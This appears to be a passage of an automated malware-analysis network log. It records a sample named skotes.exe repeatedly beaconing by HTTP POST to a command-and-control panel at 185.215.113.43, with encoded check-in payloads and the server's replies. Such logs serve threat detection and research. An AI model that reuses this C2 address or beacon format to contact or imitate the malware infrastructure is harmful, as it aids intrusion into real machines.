                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:47.847748041 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:47 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          89192.168.2.450167185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:49.478631020 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:50.817487955 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:50 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          90192.168.2.450168185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:52.573664904 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:53.919992924 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:53 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          91192.168.2.450169185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:55.556025028 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:56.900341988 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          92192.168.2.450170185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:58.650026083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:24:59.994621038 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:24:59 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          93192.168.2.450171185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:01.640630960 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:02.989242077 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:02 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          94192.168.2.450172185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:04.744283915 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:06.086571932 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          95192.168.2.450173185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:07.713782072 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:09.061479092 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:08 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          96192.168.2.450174185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:10.805212021 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:12.135826111 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:11 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          97192.168.2.450175185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:13.775290012 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:15.122625113 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          98192.168.2.450177185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:16.875596046 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:18.223558903 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          99192.168.2.450178185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:19.854020119 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:21.201339006 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          100192.168.2.450179185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:22.947693110 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:24.278608084 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          101192.168.2.450180185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:25.917435884 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:27.267522097 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:27 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          102192.168.2.450181185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:29.008838892 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:30.357003927 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:30 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          103192.168.2.450182185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:31.994438887 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:33.345285892 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:33 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          104192.168.2.450183185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:35.087059975 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:36.438555002 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:36 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
